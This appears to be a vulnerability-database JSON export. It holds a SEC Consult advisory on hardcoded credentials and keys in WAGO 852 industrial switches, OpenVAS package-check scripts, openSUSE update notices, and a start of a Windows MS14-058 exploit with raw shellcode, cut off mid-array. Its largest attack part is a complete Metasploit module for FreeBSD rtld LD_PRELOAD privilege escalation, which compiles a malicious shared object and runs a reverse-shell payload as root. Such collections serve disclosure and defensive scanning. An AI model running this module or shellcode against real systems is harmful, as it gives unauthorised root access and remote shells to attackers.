{"packetstorm": [{"lastseen": "2019-06-17T03:59:51", "bulletinFamily": "exploit", "description": "", "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "PACKETSTORM:153278", "href": "https://packetstormsecurity.com/files/153278/WAGO-852-Industrial-Managed-Switch-Series-Code-Execution-Hardcoded-Credentials.html", "title": "WAGO 852 Industrial Managed Switch Series Code Execution / Hardcoded Credentials", "type": "packetstorm", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20190612-0 > \n======================================================================= \ntitle: Multiple vulnerabilities \nproduct: WAGO 852 Industrial Managed Switch Series \nvulnerable version: 852-303: <v1.2.2.S0 \n852-1305: <v1.1.6.S0 \n852-1505: <v1.1.5.S0 \nfixed version: 852-303: v1.2.2.S0 \n852-1305: v1.1.6.S0 \n852-1505: v1.1.5.S0 \nCVE number: CVE-2019-12550, CVE-2019-12549 \nimpact: high \nhomepage: https://www.wago.com \nfound: 2019-03-08 \nby: T. Weber (Office Vienna) \nIoT Inspector \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"New ideas are the driving force behind our success WAGO is a family-owned \ncompany headquartered in Minden, Germany. Independently operating for three \ngenerations, WAGO is the global leader of spring pressure electrical \ninterconnect and automation solutions. For more than 60 years, WAGO has \ndeveloped and produced innovative products for packaging, transportation, \nprocess, industrial and building automation markets amongst others. Aside from \nits innovations in spring pressure connection technology, WAGO has introduced \nnumerous innovations that have revolutionized industry. Further ground-breaking \ninventions include: the WAGO-I/O-SYSTEM\u00ae, TOPJOB S\u00ae and WALL-NUTS\u00ae.\" \n \nSource: http://www.wago.us/wago/ \n \n \n \nBusiness recommendation: \n------------------------ \nSEC Consult recommends to immediately apply the available patches \nfrom the vendor. A thorough security review should be performed by \nsecurity professionals to identify further potential security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \nThe industrial managed switch series 852 from WAGO is affected by multiple \nvulnerabilities such as old software components embedded in the firmware. \nFurthermore, hardcoded password hashes and credentials were also found by doing \nan automated scan with IoT Inspector. Two vulnerabilities (CVE-2017-16544 and \nCVE-2015-0235) were verified by emulating the device with the MEDUSA scaleable \nfirmware runtime. The validity of the password hashes and the embedded keys were \nalso verified by emulating the device. \n \n \n1) Known BusyBox Vulnerabilities \nThe used BusyBox toolkit in version 1.12.0 is outdated and contains multiple \nknown vulnerabilities. The outdated version was found by IoT Inspector. \nOne of the discovered vulnerabilities (CVE-2017-16544) was verified by using \nthe MEDUSA scaleable firmware runtime. \n \n2) Known GNU glibc Vulnerabilities \nThe used GNU glibc in version 2.8 is outdated and contains multiple known \nvulnerabilities. The outdated version was found by IoT Inspector. One of \nthe discovered vulnerabilities (CVE-2015-0235, \"GHOST\") was verified by \nusing the MEDUSA scaleable firmware runtime. \n \n3) Hardcoded Credentials (CVE-2019-12550) \nThe device contains hardcoded users and passwords which can be used to login \nvia SSH and Telnet. \n \n4) Embedded Private Keys (CVE-2019-12549) \nThe device contains hardcoded private keys for the SSH daemon. The fingerprint \nof the SSH host key from the corresponding SSH daemon matches to the embedded \nprivate key. \n \n \nProof of concept: \n----------------- \n1) Known BusyBox Vulnerabilities \nBusyBox version 1.12.0 contains multiple CVEs like: \nCVE-2013-1813, CVE-2016-2148, CVE-2016-6301, CVE-2011-2716, CVE-2011-5325, \nCVE-2015-9261, CVE-2016-2147 and more. \n \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device. A file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created \nto trigger the vulnerability. \n \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n]55;test.txt \n# \n------------------------------------------------------------------------------- \n \n \n2) Known GNU glibc Vulnerabilities \nGNU glibc version 2.8 contains multiple CVEs like: \nCVE-2010-0296, CVE-2010-3856, CVE-2012-4412, CVE-2014-4043, CVE-2014-9402, \nCVE-2014-9761, CVE-2014-9984, CVE-2015-1472 and more. \n \nThe gethostbyname buffer overflow vulnerability (GHOST) was checked with the help \nof the exploit code from https://seclists.org/oss-sec/2015/q1/274. It was compiled \nand executed on the emulated device to test the system. \n \n \n3) Hardcoded Credentials (CVE-2019-12550) \nThe following credentials were found in the 'passwd' file of the firmware: \n<Password Hash> <Plaintext> <User> \n<removed> <removed> root \nNo password is set for the account [EMPTY PASSWORD] admin \n \nBy using these credentials, it's possible to connect via Telnet and SSH on the \nemulated device. Example for Telnet: \n------------------------------------------------------------------------------- \n[root@localhost ~]# telnet 192.168.0.133 \nTrying 192.168.0.133... \nConnected to 192.168.0.133. \nEscape character is '^]'. \n \nL2SWITCH login: root \nPassword: \n~ # \n------------------------------------------------------------------------------- \nExample for SSH: \n------------------------------------------------------------------------------- \n[root@localhost ~]# ssh 192.168.0.133 \nroot@192.168.0.133's password: \n~ # \n------------------------------------------------------------------------------- \n \n \n4) Embedded Private Keys (CVE-2019-12549) \nThe following host key fingerprint is shown by accessing the SSH daemon on \nthe emulated device: \n \n[root@localhost ~]# ssh 192.168.0.133 \nThe authenticity of host '192.168.0.133 (192.168.0.133)' can't be established. \nRSA key fingerprint is SHA256:X5Vr0/x0/j62N/aqZmHz96ojwl8x/I8mfzuT8o6uZso. \nRSA key fingerprint is MD5:2e:65:85:fc:45:04:bd:68:30:74:51:45:7d:2f:95:e2. \n \nThis matches the embedded private key (which has been removed from this advisory): \nSSH Fingerprint: 2e:65:85:fc:45:04:bd:68:30:74:51:45:7d:2f:95:e2 \n \n \nVulnerable / tested versions: \n----------------------------- \nAccording to the vendor, the following versions are affected: \n* 852-303: <v1.2.2.S0 \n* 852-1305: <v1.1.6.S0 \n* 852-1505: <v1.1.5.S0 \n \n \nVendor contact timeline: \n------------------------ \n2019-03-12: Contacting VDE CERT through info@cert.vde.com, received confirmation \n2019-03-26: Asking for a status update, VDE CERT is still waiting for details \n2019-03-28: VDE CERT requests information from WAGO again \n2019-04-09: Asking for a status update \n2019-04-11: VDE CERT: patched firmware release planned for end of May, requested \npostponement of advisory release \n2019-04-16: VDE CERT: update regarding affected firmware versions \n2019-04-24: Confirming advisory release for beginning of June \n2019-05-20: Asking for a status update \n2019-05-22: VDE CERT: no news from WAGO yet, 5th June release date \n2019-05-29: Asking for a status update \n2019-05-29: VDE CERT: detailed answer from WAGO, patches will be published \non 7th June, SEC Consult proposes new advisory release date for \n12th June \n2019-06-07: VDE CERT provides security advisory information from WAGO; \nWAGO releases security patches \n2019-06-12: Coordinated release of security advisory \n \n \nSolution: \n--------- \nThe vendor provides patches to their customers at their download page. The \nfollowing versions fix the issues: \n* 852-303: v1.2.2.S0 \n* 852-1305: v1.1.6.S0 \n* 852-1505: v1.1.5.S0 \n \nAccording to the vendor, busybox and glibc have been updated and the embedded \nprivate keys are being newly generated upon first boot and after a factory reset. \nThe root login via Telnet and SSH has been disabled and the admin account is \ndocumented and can be changed by the customer. \n \n \n \nWorkaround: \n----------- \nRestrict network access to the device & SSH server. \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/career/index.html \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/contact/index.html \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. Weber / @2019 \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/153278/SA-20190612-0.txt"}, {"lastseen": "2019-05-24T12:45:04", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-22T00:00:00", "published": "2019-05-22T00:00:00", "id": "PACKETSTORM:152997", "href": "https://packetstormsecurity.com/files/152997/FreeBSD-rtld-execl-Privilege-Escalation.html", "title": "FreeBSD rtld execl() Privilege Escalation", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'FreeBSD rtld execl() Privilege Escalation', \n'Description' => %q{ \nThis module exploits a vulnerability in the FreeBSD \nrun-time link-editor (rtld). \n \nThe rtld `unsetenv()` function fails to remove `LD_*` \nenvironment variables if `__findenv()` fails. \n \nThis can be abused to load arbitrary shared objects using \n`LD_PRELOAD`, resulting in privileged code execution. \n \nThis module has been tested successfully on: \n \nFreeBSD 7.2-RELEASE (amd64); and \nFreeBSD 8.0-RELEASE (amd64). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Kingcope', # Independent discovery, public disclosure, and exploit \n'stealth', # Discovery and exploit (4b1717926ed0d4823622011625fb1824) \n'bcoles' # Metasploit (using Kingcope's exploit code [modified]) \n], \n'DisclosureDate' => '2009-11-30', \n'Platform' => ['bsd'], # FreeBSD \n'Arch' => \n[ \nARCH_X86, \nARCH_X64, \nARCH_ARMLE, \nARCH_AARCH64, \nARCH_PPC, \nARCH_MIPSLE, \nARCH_MIPSBE \n], \n'SessionTypes' => ['shell'], \n'References' => \n[ \n['BID', '37154'], \n['CVE', '2009-4146'], \n['CVE', '2009-4147'], \n['SOUNDTRACK', 'https://www.youtube.com/watch?v=dDnhthI27Fg'], \n['URL', 'https://seclists.org/fulldisclosure/2009/Nov/371'], \n['URL', 'https://c-skills.blogspot.com/2009/11/always-check-return-value.html'], \n['URL', 'https://lists.freebsd.org/pipermail/freebsd-announce/2009-December/001286.html'], \n['URL', 'https://xorl.wordpress.com/2009/12/01/freebsd-ld_preload-security-bypass/'], \n['URL', 'https://securitytracker.com/id/1023250'] \n], \n'Targets' => [['Automatic', {}]], \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'bsd/x86/shell_reverse_tcp', \n'PrependSetresuid' => true, \n'PrependSetresgid' => true, \n'PrependFork' => true, \n'WfsDelay' => 10 \n}, \n'DefaultTarget' => 0)) \nregister_options [ \nOptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/sbin/ping' ]) \n] \nregister_advanced_options [ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef suid_exe_path \ndatastore['SUID_EXECUTABLE'] \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef is_root? \n(cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0') \nend \n \ndef check \nkernel_release = cmd_exec('uname -r').to_s \nunless kernel_release =~ /^(7\\.[012]|8\\.0)/ \nvprint_error \"FreeBSD version #{kernel_release} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"FreeBSD version #{kernel_release} appears vulnerable\" \n \nunless command_exists? 'gcc' \nvprint_error 'gcc is not installed' \nreturn CheckCode::Safe \nend \nprint_good 'gcc is installed' \n \nunless setuid? suid_exe_path \nvprint_error \"#{suid_exe_path} is not setuid\" \nreturn CheckCode::Detected \nend \nvprint_good \"#{suid_exe_path} is setuid\" \n \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nunless datastore['ForceExploit'] \nfail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' \nend \nprint_warning 'Target does not appear to be vulnerable' \nend \n \nif is_root? \nunless datastore['ForceExploit'] \nfail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' \nend \nend \n \nunless writable? base_dir \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \nif base_dir.length > 1_000 \nfail_with Failure::BadConfig, \"#{base_dir} path length #{base_dir.length} is larger than 1,000\" \nend \n \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\" \n \nexecutable_data = <<-EOF \n#include <stdio.h> \n#include <stdlib.h> \n#include <unistd.h> \n \nvoid _init() { \nextern char **environ; \nenviron=NULL; \nsystem(\"#{payload_path} &\"); \n} \nEOF \n \nexecutable_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\" \nupload \"#{executable_path}.c\", executable_data \noutput = cmd_exec \"gcc -o #{executable_path}.o -c #{executable_path}.c -fPIC -Wall\" \nregister_file_for_cleanup \"#{executable_path}.o\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{executable_path}.c failed to compile\" \nend \n \nlib_name = \".#{rand_text_alphanumeric 5..10}\" \nlib_path = \"#{base_dir}/#{lib_name}\" \noutput = cmd_exec \"gcc -shared -Wall,-soname,#{lib_name}.0 #{executable_path}.o -o #{lib_path}.0 -nostartfiles\" \nregister_file_for_cleanup \"#{lib_path}.0\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{executable_path}.o failed to compile\" \nend \n \nexploit_data = <<-EOF \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n \nint main() { \nextern char **environ; \nenviron = (char**)calloc(8096, sizeof(char)); \n \nenviron[0] = (char*)calloc(1024, sizeof(char)); \nenviron[1] = (char*)calloc(1024, sizeof(char)); \nstrcpy(environ[1], \"LD_PRELOAD=#{lib_path}.0\"); \n \nreturn execl(\"#{suid_exe_path}\", \"\", (char *)0); \n} \nEOF \n \nexploit_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\" \nupload \"#{exploit_path}.c\", exploit_data \noutput = cmd_exec \"gcc #{exploit_path}.c -o #{exploit_path} -Wall\" \nregister_file_for_cleanup exploit_path \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{exploit_path}.c failed to compile\" \nend \n \nupload payload_path, generate_payload_exe \nchmod payload_path \n \nprint_status 'Launching exploit...' \noutput = cmd_exec exploit_path \noutput.each_line { |line| vprint_status line.chomp } \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152997/rtld_execl_priv_esc.rb.txt"}], "openvas": [{"lastseen": "2019-06-05T01:40:39", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-06-04T00:00:00", "published": "2019-06-03T00:00:00", "id": "OPENVAS:1361412562310852529", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852529", "title": "openSUSE Update for screen openSUSE-SU-2019:1485-1 (screen)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852529\");\n script_version(\"2019-06-04T07:02:10+0000\");\n script_cve_id(\"CVE-2015-6806\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-04 07:02:10 +0000 (Tue, 04 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-03 02:00:39 +0000 (Mon, 03 Jun 2019)\");\n script_name(\"openSUSE Update for screen openSUSE-SU-2019:1485-1 (screen)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1485_1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00001.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'screen'\n package(s) announced via the openSUSE-SU-2019:1485_1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for screen fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2015-6806: Fixed a stack overflow due to deep recursion (bsc#944458).\n\n Non-security issue fixed:\n\n - Fixed segmentation faults related to altscreen and resizing screen\n (bsc#1130831).\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-1485=1\");\n\n script_tag(name:\"affected\", value:\"'screen' package(s) on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"screen\", rpm:\"screen~4.0.4~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"screen-debuginfo\", rpm:\"screen-debuginfo~4.0.4~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"screen-debugsource\", rpm:\"screen-debugsource~4.0.4~10.3.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-06-05T01:40:37", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-06-04T00:00:00", "published": "2019-06-02T00:00:00", "id": "OPENVAS:1361412562310852527", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852527", "title": "openSUSE Update for lxc, openSUSE-SU-2019:1481-1 (lxc, )", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852527\");\n script_version(\"2019-06-04T07:02:10+0000\");\n script_cve_id(\"CVE-2015-1331\", \"CVE-2015-1334\", \"CVE-2015-1335\", \"CVE-2017-5985\", \"CVE-2018-6556\", \"CVE-2019-5736\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-06-04 07:02:10 +0000 (Tue, 04 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-02 02:01:05 +0000 (Sun, 02 Jun 2019)\");\n script_name(\"openSUSE Update for lxc, openSUSE-SU-2019:1481-1 (lxc, )\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1481_1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00073.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lxc, '\n package(s) announced via the openSUSE-SU-2019:1481_1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for lxc, lxcfs to version 3.1.0 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-5736: Fixed a container breakout vulnerability (boo#1122185).\n\n - CVE-2018-6556: Enable setuid bit on lxc-user-nic (boo#988348).\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-1481=1\");\n\n script_tag(name:\"affected\", value:\"'lxc, ' package(s) on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"lxcfs\", rpm:\"lxcfs~3.0.3~2.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lxcfs-debuginfo\", rpm:\"lxcfs-debuginfo~3.0.3~2.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lxcfs-debugsource\", rpm:\"lxcfs-debugsource~3.0.3~2.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"liblxc-devel\", rpm:\"liblxc-devel~3.1.0~24.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"liblxc1\", rpm:\"liblxc1~3.1.0~24.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"liblxc1-debuginfo\", rpm:\"liblxc1-debuginfo~3.1.0~24.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lxc\", rpm:\"lxc~3.1.0~24.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lxc-debuginfo\", rpm:\"lxc-debuginfo~3.1.0~24.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lxc-debugsource\", rpm:\"lxc-debugsource~3.1.0~24.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pam_cgfs\", rpm:\"pam_cgfs~3.1.0~24.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pam_cgfs-debuginfo\", rpm:\"pam_cgfs-debuginfo~3.1.0~24.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lxc-bash-completion\", rpm:\"lxc-bash-completion~3.1.0~24.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lxcfs-hooks-lxc\", rpm:\"lxcfs-hooks-lxc~3.0.3~2.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2019-06-02T20:32:27", "bulletinFamily": "unix", "description": "This update for screen fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2015-6806: Fixed a stack overflow due to deep recursion (bsc#944458).\n\n Non-security issue fixed:\n\n - Fixed segmentation faults related to altscreen and resizing screen\n (bsc#1130831).\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "modified": "2019-06-02T18:12:55", "published": "2019-06-02T18:12:55", "id": "OPENSUSE-SU-2019:1485-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00001.html", "title": "Security update for screen (moderate)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-31T22:45:59", "bulletinFamily": "unix", "description": "This update for lxc, lxcfs to version 3.1.0 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-5736: Fixed a container breakout vulnerability (boo#1122185).\n - CVE-2018-6556: Enable setuid bit on lxc-user-nic (boo#988348).\n\n Non-security issues fixed:\n\n - Update to LXC 3.1.0. The changelog is far too long to include here,\n please look at <a rel=\"nofollow\" href=\"https://linuxcontainers.org/\">https://linuxcontainers.org/</a>. (boo#1131762)\n\n", "modified": "2019-05-31T21:11:48", "published": "2019-05-31T21:11:48", "id": "OPENSUSE-SU-2019:1481-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00073.html", "title": "Security update for lxc, lxcfs (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-05-31T18:10:18", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-05-30T00:00:00", "published": "2019-05-30T00:00:00", "id": "1337DAY-ID-32825", "href": "https://0day.today/exploit/description/32825", "title": "Microsoft Windows 8.1 / Server 2012 - Win32k.sys Local Privilege Escalation (MS14-058) Exploit", "type": "zdt", "sourceData": "#include \"hd.h\"\r\n\r\n// EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945.rar\r\n\r\n\r\nbyte __s_code[]={\r\n\t0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 ,\r\n\t0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 ,\r\n\t0x4C ,0x89 ,0x70 ,0x10 ,0x90 ,0x65 ,0x48 ,0x8B ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8B ,\r\n\t0x40 ,0x60 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x8B ,0x78 ,0x18 ,0x48 ,0x8B ,0x47 ,0x10 ,0x48 ,0x83 ,\r\n\t0xC7 ,0x10 ,0x48 ,0x3B ,0xC7 ,0x0F ,0x84 ,0x99 ,0x01 ,0x00 ,0x00 ,0x48 ,0xBB ,0x65 ,0x00 ,0x6C ,\r\n\t0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x48 ,0xBE ,0x2E ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x6C ,0x00 ,0x49 ,\r\n\t0xBA ,0x6B ,0x00 ,0x65 ,0x00 ,0x72 ,0x00 ,0x6E ,0x00 ,0x48 ,0xBD ,0x4B ,0x00 ,0x45 ,0x00 ,0x52 ,\r\n\t0x00 ,0x4E ,0x00 ,0x49 ,0xB8 ,0x45 ,0x00 